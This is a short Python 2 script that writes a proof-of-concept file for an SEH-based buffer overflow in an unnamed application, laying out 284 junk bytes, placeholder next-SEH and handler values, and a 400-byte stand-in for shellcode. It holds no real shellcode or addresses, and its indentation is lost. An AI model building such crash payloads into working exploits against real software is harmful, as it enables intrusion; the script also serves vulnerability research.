import subprocess,time
import sys,os
if os.name == "nt" :
subprocess.call('cls', shell=True)
os.system("color c")
else :
subprocess.call('clear', shell=True)
time.sleep(1)
print
JNK = "A" * 284
NEH = "B" * 4
SEH = "C" * 4
SHL = "S" * 400
POC = JNK + NEH + SEH + SHL
try :
file = open("poc.txt", "w")
file.write(POC)
file.close()
print "\n[*] file created successfully"
except:
print "[#] error to create file"
close = raw_input("\n[!] press any button to close()")